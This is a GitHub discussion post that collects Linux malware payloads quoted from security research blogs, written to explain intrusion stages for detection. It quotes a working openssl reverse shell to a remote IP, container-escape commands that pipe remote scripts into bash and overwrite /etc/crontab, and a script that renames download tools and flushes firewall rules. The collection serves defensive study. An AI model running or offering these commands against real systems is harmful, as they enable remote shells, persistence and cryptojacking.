Collection of GNU/Linux malware payloads #1119
gustavo-iniguez-goya
started this conversation in
Show and tell
Replies: 1 comment
-
|
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
Uh oh!
There was an error while loading. Please reload this page.
-
This is a collection of malware payloads, extracted from several security blogs. I'll update it from time to time, but if you have some more to share, post a comment and I'll update it.
Hopefully it'll help to understand the common stages of an intrussion: hack a service -> drop a file to /tmp/, /var/tmp, /dev/shm , ... -> open an outbound connection to remote url to download additional tools -> escalate privileges -> gain persistance
and suspicious behaviours:
https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot
https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware
https://www.cisa.gov/news-events/analysis-reports/ar23-209c
setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet
chroot, container escapes, use of gcc...
https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/
(multiple initial vectors, at the bottom of the post for more)
chroot /mnt /bin/sh -c 'if ! type curl >/dev/null; then apt-get install -y curl; apt-get install -y --reinstall curl; yum clean all; yum install -y curl; yum reinstall -y curl; fi; echo OdODKFfkfWOffmfqpPWkjdmMdnddd== | base64 -d - >/etc/crontab && echo OdODKFfkfWOffmfqpPWkjdmMdnddd== | base64 -d - >> /etc/crontab`sh -c 'chroot /host; apt-get update; apt-get install -y curl bash wget; curl 1.2.3.4/dc.sh|bash'sh -c 'chroot /host; apt-get update; apt-get install -y curl git g++ make bash wget; curl 1.2.3.4/k.sh|bash'(ofuscated payload, url)
(no payload) infecting VSCode, downloading external resources:
https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
(use of docker image for cryptomining)
https://www.crowdstrike.com/blog/crowdstrike-discovers-first-ever-dero-cryptojacking-campaign-targeting-kubernetes/
(use of docker image for cryptomining)
https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/
https://www.crowdstrike.com/blog/new-docker-cryptojacking-attempts-detected-over-2021-holidays/
https://www.cadosecurity.com/blog/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks
https://www.cadosecurity.com/blog/migo-a-redis-miner-with-novel-system-weakening-techniques
https://www.cadosecurity.com/blog/redis-p2pinfect
attempt to bypass detections (by renaming wget, ...)
mv /usr/bin/wget /usr/bin/wgbtx;mv /usr/bin/curl /usr/bin/clbtx;iptables -F;iptables -P INPUT ACCEPT;iptables -P OUTPUT ACCEPT;if ! which iptables;then apt-get install -y iptables iptables-services || yum install -y iptables iptables-services || dnf install -y iptables iptables-services || zypper install -y iptables iptables-services || pacman -S --noconfirm iptables iptables-services;fi; if ! which awk;then apt-get install -y gawk || yum install -y gawk || dnf install -y gawk || zypper install -y gawk || pacman -S --noconfirm gawk;fi; if ! which netstat;then apt-get install -y net-tools || yum install -y net-tools || dnf install -y net-tools || zypper install -y net-tools || pacman -S --noconfirm net-tools;fi; redis_ips=$(netstat -tnp | grep ':6379' | grep 'ESTABLISHED' | awk '{print $5}' | awk -F ':' '{print $1}' | sort -u);for ip in $redis_ips;do iptables -A INPUT -p tcp --dport 6379 -s "$ip" -j ACCEPT; done; iptables -A INPUT -p tcp --dport 6379 -j DROP; iptables -A INPUT -p tcp --dport <port binary listens on> -j ACCEPThttps://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence
https://www.cadosecurity.com/blog/redis-miner-leverages-command-line-file-hosting-service
(generic wget/curl usage)
https://www.cadosecurity.com/blog/redis-miner-leverages-command-line-file-hosting-service
https://www.cadosecurity.com/blog/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack
https://www.cadosecurity.com/blog/previously-undiscovered-teamtnt-payload-recently-surfaced
log4shell:
https://www.cadosecurity.com/blog/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228
https://www.cadosecurity.com/blog/coinstomp-malware-family-targets-asian-cloud-service-providers
https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/
worpress plugin vuln, from LFI to RCE:
https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers
https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
https://sysdig.com/blog/malware-analysis-shellbot-sysdig/
https://redcanary.com/blog/rocke-cryptominer/
[11/12/2025] React2Shell attacks:
https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks
https://www.huntress.com/blog/peerblight-linux-backdoor-exploits-react2shell
https://tlpblack.net/blog/20251209-the-anatomy-of-a-react2shell-compromise
Beta Was this translation helpful? Give feedback.
All reactions